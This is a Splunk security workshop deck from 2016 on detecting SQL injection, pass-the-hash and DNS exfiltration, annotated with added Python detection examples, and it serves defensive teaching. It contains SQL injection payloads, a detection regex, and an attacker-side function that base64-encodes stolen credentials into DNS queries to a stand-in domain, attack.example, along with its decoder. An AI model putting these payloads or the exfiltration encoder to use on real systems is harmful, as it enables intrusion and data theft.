Splunk Enterprise for Information Security Hands-On Breakout Session
  1. Lab access: https://<yourIP>/  Username: splunklive  Password: security
     Aquarius – 50.31.150.235      Virgo A-M – 50.31.150.247
     Pisces – 50.31.150.236        Virgo N-Z – 50.31.150.248
     Aries – 50.31.150.237         Libra – 50.31.150.249
     Taurus – 50.31.150.238        Scorpio A-M – 50.31.150.250
     Gemini – 50.31.150.239        Scorpio N-Z – 50.31.150.251
     Cancer – 50.31.150.245        Sagittarius – 50.31.150.252
     Leo – 50.31.150.246           Capricorn – 50.31.150.253
  2. Copyright © 2016 Splunk Inc.
     Splunk Enterprise for InfoSec Hands-On
     Seattle, May 3, 2016
     Cody Harris and Dave Herrald
  3. Agenda: Intro; Web Attacks; Lateral Movement; DNS Exfiltration; Wrap-up / Q&A
  4. Intro
  5. Machine data contains a definitive record of all interactions. Splunk is a very effective platform to collect, store, and analyze all of that data. (Diagram: human-to-machine and machine-to-machine interactions.)
  6. Platform for Machine Data: across data sources, use cases & consumption models
     Data sources: Mainframe Data, VMware, Exchange, Relational Databases, Mobile, Forwarders, Syslog / TCP / Other, Sensors & Control Systems, Wire Data
     Splunk Solutions (easy to adopt): Splunk Premium Solutions & Apps (PCI, Security, IT Svc Int / ITSI, UBA) and a rich ecosystem of apps
  7. Rapid Ascent in the Gartner SIEM Magic Quadrant*
     2011 Niche Player; 2012 Challenger; 2013 Leader; 2014 Leader; 2015 Leader and the only vendor to improve its visionary position.
     *Gartner, Inc., SIEM Magic Quadrant 2011-2015. Gartner does not endorse any vendor, product or service depicted in its research publication and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.
  8. (Lab access details, repeated from slide 1.)
  9. Web Attacks
 10. OWASP 2013 Top 10
     [10] Unvalidated redirects and forwards
     [9] Using components with known vulnerabilities
     [8] Cross-site request forgery
     [7] Missing function level access control
     [6] Sensitive data exposure
     [5] Security misconfiguration
     [4] Insecure direct object reference
     [3] Cross-site scripting (XSS)
     [2] Broken authentication and session management
 11. [1] Injection
     SQL injection
     Code injection
     Command injection
     LDAP injection
     XML injection
     XPath injection
     SSI injection
     IMAP/SMTP injection
     Buffer overflow
 12. Why did I get breached? SQLi has been around a very, very long time.
 13. Imperva Web Application Attacks Report, 2015 (chart)
 14. (chart, no text)
 15. The anatomy of a SQL injection attack
     Application query: SELECT * FROM users WHERE email='<email>' AND password='<password>';
     Example row in users: admin@admin.sys / 1234
     An attacker might supply: email = xxx@xxx.xxx' OR 1 = 1 --   and password = xxx
     Resulting query: SELECT * FROM users WHERE email='xxx@xxx.xxx' OR 1 = 1 -- ' AND password='xxx';
     The injected quote closes the string literal, OR 1 = 1 makes the WHERE clause true for every row, and -- turns the rest of the statement, including the password check, into a comment.
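The slide's attack, worked through end to end as an added example (this is not code from the deck): the users table, its admin row and the attacker's two inputs are the ones on the slide; the second row and the column names are constructed. The query runs against an in-memory SQLite database twice, once built by string concatenation as the slide shows and once with bound parameters, which is the fix.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the users table on the slide."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT PRIMARY KEY, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin@admin.sys", "1234"), ("dave@corp.example", "hunter2")],
    )
    return conn


def login_vulnerable(conn, email: str, password: str):
    """Builds the slide's query by string concatenation, so user input becomes SQL."""
    sql = f"SELECT email FROM users WHERE email='{email}' AND password='{password}';"
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, email: str, password: str):
    """Same query with bound parameters: the quote and the -- comment stay data."""
    sql = "SELECT email FROM users WHERE email=? AND password=?;"
    return [row[0] for row in conn.execute(sql, (email, password))]


# Exactly what the slide shows the attacker typing into the two form fields.
ATTACKER_EMAIL = "xxx@xxx.xxx' OR 1 = 1 -- "
ATTACKER_PASSWORD = "xxx"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:   ", login_vulnerable(db, ATTACKER_EMAIL, ATTACKER_PASSWORD))
    print("parameterized:", login_parameterized(db, ATTACKER_EMAIL, ATTACKER_PASSWORD))
```

The concatenated version returns every row in the table without a valid password; the parameterized version returns nothing for the same input and still authenticates a real user, because the driver sends the input as a value rather than splicing it into the statement text.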
 16. TalkTalk: PII/financial data for 4M customers. VTech: PII for 5M adults and kids.
 17. …and so far this year…
 18. OR
 19. You might need help! Follow along with the narration in the app, at least for the first few examples.
 20. Newbie Path
 21. Step by Step? Good for later!
 22. How step-by-step works. But don't use it now.
 23. You've got this! Copy and paste the example searches into the "search bar" in the "SplunkLive Security 2016" app.
 24. Ninja Path
 25. Ninja Path
 26. What have we here? Our learning environment consists of:
     • 14 publicly accessible single Splunk servers
     • Each with ~5.5M events, from real environments but massaged:
       • Windows Security events
       • Apache web access logs
       • Bro DNS & HTTP
       • Palo Alto traffic logs
       • Some other various bits
 27. Let's get hands on! Web Attacks: Basic
 28. https://splunkbase.splunk.com/app/1528/
     Search for possible SQL injection in your events:
     • looks for patterns in the URI query field to see if anyone has injected SQL statements into it
     • flags abnormally long URI query values: those more than 2.5 standard deviations above the average length of the field
     Macros used
     • sqlinjection_pattern(sourcetype, uri query field)
     • sqlinjection_stats(sourcetype, uri query field)
 29. Regular Expression FTW
     sqlinjection_rex is a search macro. It contains:
     (?<injection>(?i)select.*?from|union.*?select|'$|delete.*?from|update.*?set|alter.*?table|([ %27|'](%20)*=(%20)*[%27|'])|\w*[%27|']or)
     Which means: in the string we are given, look for ANY of the following matches and put that into the "injection" field.
     • Anything containing SELECT followed by FROM
     • Anything containing UNION followed by SELECT
     • Anything with a ' at the end
     • Anything containing DELETE followed by FROM
     • Anything containing UPDATE followed by SET
     • Anything containing ALTER followed by TABLE
     • A %27 or a ', then any number of %20, then =, then any number of %20, then a %27 or a '
     • Note: %27 is URL-encoded ' and %20 is URL-encoded <space>
     • Any number of word characters followed by a %27 or a ' and then "or"
     Caveat: square brackets make a character class, so [ %27|'] as written matches any single one of the characters space, %, 2, 7, | and ', not the two-character sequence %27 or a quote as the bullets describe; the intended construct is (%27|'). Note also that the pattern does not match the URL-encoded form of the slide-15 payload (%27%20OR%201%3D1), because a %20 separates the quote from OR and the = is encoded; that gap is why the app pairs the pattern with the length statistics.
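The two checks from slides 28 and 29, run here over constructed Apache access-log lines. This is an added example, not the SQL Injection app's own code: the regex is the slide's sqlinjection_rex with two transcription changes (Python's (?P<...>) group syntax, and the alternation (%27|') that the slide's explanation describes in place of the character class), and the 2.5-sigma length test stands in for sqlinjection_stats. The sample log lines and the request-line parser are assumptions.

```python
import re
import statistics
from typing import Optional

# The deck's sqlinjection_rex macro, transcribed into Python's regex dialect.
# Two deliberate changes from the slide: Python spells named groups (?P<...>),
# and the slide's character class [ %27|'] is written as the alternation
# (?:%27|') that the slide's own explanation describes.
SQLI_PATTERN = re.compile(
    r"(?P<injection>select.*?from|union.*?select|'$|delete.*?from|update.*?set"
    r"|alter.*?table|(?:%27|')(?:%20)*=(?:%20)*(?:%27|')|\w*(?:%27|')or)",
    re.IGNORECASE,
)

# Only the request line of an Apache access-log record is needed here.
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (?P<uri>\S+) HTTP/[\d.]+"')


def uri_query(log_line: str) -> Optional[str]:
    """Query string of the request URI; '' if there is none, None if the line does not parse."""
    m = REQUEST_LINE.search(log_line)
    if not m:
        return None
    uri = m.group("uri")
    return uri.split("?", 1)[1] if "?" in uri else ""


def injection_pattern(query: str) -> Optional[str]:
    """sqlinjection_pattern: the text captured into the `injection` field, or None."""
    m = SQLI_PATTERN.search(query)
    return m.group("injection") if m else None


def long_query_outliers(queries, sigma: float = 2.5):
    """sqlinjection_stats: indexes of queries whose length lies more than `sigma`
    sample standard deviations above the mean length of the whole batch."""
    lengths = [len(q) for q in queries]
    if len(lengths) < 2:
        return []
    mean, sd = statistics.mean(lengths), statistics.stdev(lengths)
    if sd == 0:
        return []
    return [i for i, n in enumerate(lengths) if (n - mean) / sd > sigma]


def detect(log_lines):
    """Both checks over a batch of access-log lines -> {line index: reason}."""
    queries = [uri_query(line) or "" for line in log_lines]
    hits = {}
    for i, q in enumerate(queries):
        captured = injection_pattern(q)
        if captured:
            hits[i] = f"pattern: {captured}"
    for i in long_query_outliers(queries):
        hits.setdefault(i, f"length outlier: {len(queries[i])} chars")
    return hits


def _line(uri: str) -> str:
    # Constructed Apache common-log record; only the request URI varies.
    return f'10.0.0.5 - - [03/May/2016:10:00:00 -0700] "GET {uri} HTTP/1.1" 200 512'


# Constructed sample: twelve ordinary requests, then three injection attempts.
SAMPLE_LOG = [_line(u) for u in (
    "/shop?q=shoes", "/shop?page=2", "/item?id=1042", "/shop?q=red+boots",
    "/shop?lang=en", "/shop?sort=price", "/item?id=77", "/shop?q=hat",
    "/shop?page=3", "/shop?cat=men", "/item?id=5", "/shop?q=socks",
    "/item?id=1%27%20union%20select%201--",                                   # pattern only
    "/login?email=xxx%40xxx.xxx%27%20OR%201%20%3D%201%20--%20&password=xxx",  # length only
    "/profile?user=admin%27or%201%3D1",                                       # pattern only
)]

if __name__ == "__main__":
    for i, reason in sorted(detect(SAMPLE_LOG).items()):
        print(i, reason)
```

The three attempts are caught by different checks: the UNION and the admin'or payloads by the regex, the slide-15 payload only by its length, since its encoded form never matches the pattern. That is the practical lesson of the two macros: neither alone is sufficient, and the length test depends on the batch it is computed over, so run it per sourcetype and per application rather than across the whole index.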
 30. Let's get hands on! Web Attacks: Advanced
 31. Bonus: Try out the SQL Injection app!
 32. Summary: Web attacks/SQL injection
     SQL injection provides attackers with easy access to data.
     Detecting advanced SQL injection is hard – use an app!
     Understand where SQLi is happening on your network and put a stop to it.
     Augment your WAF with enterprise-wide Splunk searches.
 33. Lateral Movement
 34. Poking around: an attacker hacks a non-privileged user system. So what?
 35. Lateral Movement is the expansion of systems controlled and data accessed.
 36. Most famous Lateral Movement attack (excluding password re-use)? Pass the Hash!
 37. This and other techniques were used in the destructive Sands breach… and at Sony, too.
 38. Detecting Legacy PtH
     Look for Windows Events:
     Event ID: 4624 or 4625
     Logon type: 3 (network)
     Auth package: NTLM
     User account is not a domain logon and is not ANONYMOUS LOGON
     …this is trivially easy in Splunk.
 39. Let's get hands on! Lateral Movement: Legacy
 40. Then it got harder
     • Pass the Hash tools have improved
     • Adjustment of jitter and other metrics
     • So let's detect lateral movement differently – just looking at Windows event codes isn't enough.
 41. Network traffic provides a source of truth
     I usually talk to 10 hosts. Then one day I talk to 10,000 hosts. ALARM!
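Slides 38 to 41 describe two detections. The block below is an added Python example, not code from the deck or from Splunk, and implements both over constructed data: the legacy pass-the-hash filter on Windows Security events (field names as the Splunk Add-on for Windows emits them; the domain name CORP is assumed, and the rule reads slide 38 as excluding ANONYMOUS LOGON), and the distinct-destination baseline from slide 41 over flow records of the form (day, source, destination). The 10x ratio and the 50-host floor are assumed thresholds.

```python
import statistics
from collections import defaultdict

# Assumed NetBIOS name of the Active Directory domain; any other Account_Domain
# (a workstation or server name) means a local account.
DOMAIN_NAMES = {"CORP"}


def is_legacy_pth(event: dict, domains=DOMAIN_NAMES) -> bool:
    """Slide 38's rule: 4624/4625, network logon (type 3), NTLM, and an account that
    is neither a domain account nor ANONYMOUS LOGON."""
    if event.get("EventCode") not in (4624, 4625):
        return False
    if event.get("Logon_Type") != 3 or event.get("Authentication_Package") != "NTLM":
        return False
    name = event.get("Account_Name", "").upper()
    domain = event.get("Account_Domain", "").upper()
    if name == "ANONYMOUS LOGON":
        return False
    return domain not in {d.upper() for d in domains}


def distinct_destination_spikes(conn_records, ratio=10.0, min_dests=50):
    """Slide 41's idea on flow records (day, src, dst): for each source, compare the
    number of distinct destinations on a day with the mean over its earlier days."""
    per_day = defaultdict(set)
    for day, src, dst in conn_records:
        per_day[(src, day)].add(dst)
    by_src = defaultdict(dict)
    for (src, day), dsts in per_day.items():
        by_src[src][day] = len(dsts)
    alerts = []
    for src, days in sorted(by_src.items()):
        for day in sorted(days):
            history = [days[d] for d in days if d < day]
            if not history:
                continue  # no baseline yet for this source
            baseline = statistics.mean(history)
            if days[day] >= min_dests and days[day] > ratio * baseline:
                alerts.append((src, day, days[day], baseline))
    return alerts


# Constructed Windows Security events using the add-on's field names.
SAMPLE_EVENTS = [
    {"EventCode": 4624, "Logon_Type": 3, "Authentication_Package": "Kerberos",
     "Account_Name": "dave", "Account_Domain": "CORP", "Computer": "FS01"},
    {"EventCode": 4624, "Logon_Type": 3, "Authentication_Package": "NTLM",
     "Account_Name": "dave", "Account_Domain": "CORP", "Computer": "FS01"},
    {"EventCode": 4624, "Logon_Type": 3, "Authentication_Package": "NTLM",
     "Account_Name": "ANONYMOUS LOGON", "Account_Domain": "NT AUTHORITY", "Computer": "FS01"},
    {"EventCode": 4624, "Logon_Type": 3, "Authentication_Package": "NTLM",
     "Account_Name": "Administrator", "Account_Domain": "FS01", "Computer": "FS01"},
    {"EventCode": 4625, "Logon_Type": 3, "Authentication_Package": "NTLM",
     "Account_Name": "Administrator", "Account_Domain": "WS07", "Computer": "WS07"},
    {"EventCode": 4624, "Logon_Type": 2, "Authentication_Package": "NTLM",
     "Account_Name": "Administrator", "Account_Domain": "WS07", "Computer": "WS07"},
]

# Constructed flow records: one host with a steady set of 10 peers for five days,
# then 200 peers on day 6; a second host that is simply always busy.
SAMPLE_FLOWS = []
for _day in range(1, 7):
    _n = 200 if _day == 6 else 10
    SAMPLE_FLOWS += [(_day, "10.1.1.5", f"10.1.2.{i}") for i in range(1, _n + 1)]
    SAMPLE_FLOWS += [(_day, "10.1.1.9", f"10.1.3.{i}") for i in range(1, 61)]


def pth_hits(events=SAMPLE_EVENTS):
    return [e for e in events if is_legacy_pth(e)]


if __name__ == "__main__":
    for e in pth_hits():
        print("legacy PtH candidate:", e["Account_Domain"], e["Account_Name"], "on", e["Computer"])
    for src, day, count, baseline in distinct_destination_spikes(SAMPLE_FLOWS):
        print(f"{src}: day {day} talked to {count} hosts, baseline {baseline:.0f}")
```

Two things the sample is built to show: a domain account logging on over NTLM (event 2) is not flagged by the slide-38 rule, which is the gap slide 40 is about, and the busy host 10.1.1.9 is not flagged on the network side because the comparison is against its own history rather than a global threshold. In production the baseline window should be long enough to cover weekly patterns, and logon type 3 NTLM events from local accounts on unjoined or legacy systems will need tuning out.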
 42. Let's get hands on! Lateral Movement: Network Traffic
 43. iz so hard… u haz magic?
 44. iz so hard… u haz magic? Come see UBA detect lateral movement/PtH at the demo booths.
 45. Summary: Lateral Movement
     Attacker success defines the scope of a breach.
     High difficulty, high importance.
     Worth doing in Splunk. Easy with UBA.
 46. DNS Exfiltration
 47. domain=corp;user=dave;password=12345
     → base64-encode (the slide labels this step "encrypt", but the string below is plain base64 encoding, not encryption, so anyone who captures the query can decode it)
     DNS Query: ZG9tYWluPWNvcnA7dXNlcj1kYXZlO3Bhc3N3b3JkPTEyMzQ1DQoNCg==.attack.com
 48. DNS exfiltration: DNS exfil tends to be overlooked within an ocean of DNS data. Let's fix that!
 49. DNS exfiltration
     "FrameworkPOS: a card-stealing program that exfiltrates data from the target's network by transmitting it as domain name system (DNS) traffic ... But the big difference is the way stolen data is exfiltrated: the malware used DNS requests!"
     https://blog.gdatasoftware.com/2014/10/23942-new-frameworkpos-variant-exfiltrates-data-via-dns-requests
     "… few organizations actually keep detailed logs or records of the DNS traffic traversing their networks — making it an ideal way to siphon data from a hacked network."
     http://krebsonsecurity.com/2015/05/deconstructing-the-2014-sally-beauty-breach/#more-30872
 50. https://splunkbase.splunk.com/app/2734/
     DNS exfil detection – tricks of the trade
     • parse URLs & complicated TLDs (Top Level Domains)
     • calculate Shannon Entropy
     List of provided lookups
     • ut_parse_simple(url)
     • ut_parse(url, list) or ut_parse_extended(url, list)
     • ut_shannon(word)
     • ut_countset(word, set)
     • ut_suites(word, sets)
     • ut_meaning(word)
     • ut_bayesian(word)
     • ut_levenshtein(word1, word2)
 51. Shannon Entropy
     Layman's definition: a score reflecting the randomness or measure of uncertainty of a string
     Examples
     • The domain aaaaa.com has a Shannon Entropy score of 1.8 (very low)
     • The domain google.com has a Shannon Entropy score of 2.6 (rather low)
     • A00wlkj—(-a.aslkn-C.a.2.sk.esasdfasf1111)-890209uC.4.com has a Shannon Entropy score of 3 (rather high)
 52. Detecting Data Exfiltration
     index=bro sourcetype=bro_dns
     | `ut_parse(query)`
     | `ut_shannon(ut_subdomain)`
     | eval sublen = length(ut_subdomain)
     | table ut_domain ut_subdomain ut_shannon sublen
     Tips: leverage our Bro DNS data; calculate Shannon Entropy scores; calculate subdomain length; display details.
 53. Let's get hands on! DNS Exfiltration
 54. Detecting Data Exfiltration
     … | stats count avg(ut_shannon) as avg_sha avg(sublen) as avg_sublen stdev(sublen) as stdev_sublen by ut_domain
     | search avg_sha>3 avg_sublen>20 stdev_sublen<2
     Tips: leverage our Bro DNS data; calculate Shannon Entropy scores; calculate subdomain length; display count, scores, lengths, deviations.
 55. Detecting Data Exfiltration: RESULTS
     • Exfiltrating data requires many DNS requests – look for high counts
     • DNS exfiltration to mooo.com and chickenkiller.com
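Slides 47 and 50 to 55 together describe the channel and the search that finds it. The block below is an added Python example, not URL Toolbox's or the deck's code: a simplified ut_parse (last two labels as the registered domain, so it mis-parses co.uk-style suffixes that the real lookup handles via the public suffix list), ut_shannon, the per-domain stats from slide 54 with the same thresholds, and, for the attacker side, the base64-in-subdomain encoding from slide 47 and its decoder. The secret, the benign queries and the domain attack.example are constructed; URL-safe base64 without padding is used so the labels stay within hostname characters.

```python
import base64
import math
import statistics
from collections import defaultdict


def parse_query(query: str):
    """Simplified ut_parse: registered domain = last two labels, subdomain = the rest."""
    labels = query.rstrip(".").split(".")
    if len(labels) < 2:
        return query, ""
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def shannon(word: str) -> float:
    """ut_shannon: entropy of the string in bits per character."""
    if not word:
        return 0.0
    n = len(word)
    counts = defaultdict(int)
    for ch in word:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def exfil_candidates(queries, min_entropy=3.0, min_len=20, max_stdev=2.0):
    """Slide 54's stats search: per registered domain, count, mean subdomain entropy,
    mean subdomain length and the sample stdev of that length, filtered with the
    deck's thresholds avg_sha>3, avg_sublen>20, stdev_sublen<2."""
    subs_by_domain = defaultdict(list)
    for q in queries:
        domain, sub = parse_query(q)
        subs_by_domain[domain].append(sub)
    rows = {}
    for domain, subs in subs_by_domain.items():
        lens = [len(s) for s in subs]
        rows[domain] = {
            "count": len(subs),
            "avg_sha": statistics.mean([shannon(s) for s in subs]),
            "avg_sublen": statistics.mean(lens),
            "stdev_sublen": statistics.stdev(lens) if len(lens) > 1 else 0.0,
        }
    return {d: r for d, r in rows.items()
            if r["avg_sha"] > min_entropy and r["avg_sublen"] > min_len
            and r["stdev_sublen"] < max_stdev}


def exfil_queries(secret: bytes, domain: str, chunk: int = 25):
    """Attacker side, as on slide 47: base64 the data and ship it as subdomain labels.
    URL-safe base64 ('-' and '_' instead of '+' and '/') without padding."""
    blob = base64.urlsafe_b64encode(secret).rstrip(b"=").decode()
    return [f"{blob[i:i + chunk]}.{domain}" for i in range(0, len(blob), chunk)]


def decode_exfil(queries, domain: str) -> bytes:
    """What the attacker's authoritative server does: reassemble and decode."""
    blob = "".join(parse_query(q)[1] for q in queries if parse_query(q)[0] == domain)
    return base64.urlsafe_b64decode(blob + "=" * (-len(blob) % 4))


# Constructed Bro DNS `query` values: ordinary traffic plus one exfiltration session.
SECRET = b"domain=corp;user=dave;password=12345;card=4929-8412-3370-5514;exp=05/19\r\n"
BENIGN_QUERIES = ["www.google.com", "mail.google.com", "drive.google.com",
                  "cdn.example.net", "static.example.net", "time.windows.com"]
EXFIL_QUERIES = exfil_queries(SECRET, "attack.example")  # attacker domain is assumed

if __name__ == "__main__":
    for q in EXFIL_QUERIES:
        print(q)
    for d, r in exfil_candidates(BENIGN_QUERIES + EXFIL_QUERIES).items():
        print(d, r)
```

Only attack.example survives the three thresholds: its labels are long, high-entropy and of nearly constant length, exactly the signature the slide-54 search keys on, while www/mail/drive under google.com average well under 3 bits. Long, high-entropy labels are also produced by CDNs, anti-malware lookups and some authentication systems, so the count column and the domain itself still need a human look before anyone declares an incident.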
 56. Summary: DNS exfiltration
     Exfiltration by DNS and ICMP is a very common technique.
     Many organizations do not analyze DNS activity – do not be like them!
     No DNS logs? No Splunk Stream? Look at firewall byte counts.
 57. Wrap-up / Q&A
 58. Summary
     Multiple phases to modern attacks.
     Deploy detection across all phases.
     Also consider adaptive response!
     Stay abreast of modern advancements.
     App Export: https://splunk.box.com/v/SplunkLive2016SeattleSec
 59. The 7th Annual Splunk Worldwide Users' Conference
     SEPT 26-29, 2016, WALT DISNEY WORLD, ORLANDO, SWAN AND DOLPHIN RESORTS
     • 5000+ IT & Business Professionals
     • 3 days of technical content
     • 165+ sessions
     • 80+ Customer Speakers
     • 35+ Apps in Splunk Apps Showcase
     • 75+ Technology Partners
     • 1:1 networking: Ask The Experts and Security Experts, Birds of a Feather and Chalk Talks
     • NEW hands-on labs!
     • Expanded show floor, Dashboards Control Room & Clinic, and MORE!
     PLUS Splunk University
     • Three days: Sept 24-26, 2016
     • Get Splunk Certified for FREE!
     • Get CPE credits for CISSP, CAP, SSCP
     • Save thousands on Splunk education!
 60. THANK YOU
     https://splunk.box.com/v/SplunkLive2016SeattleSec
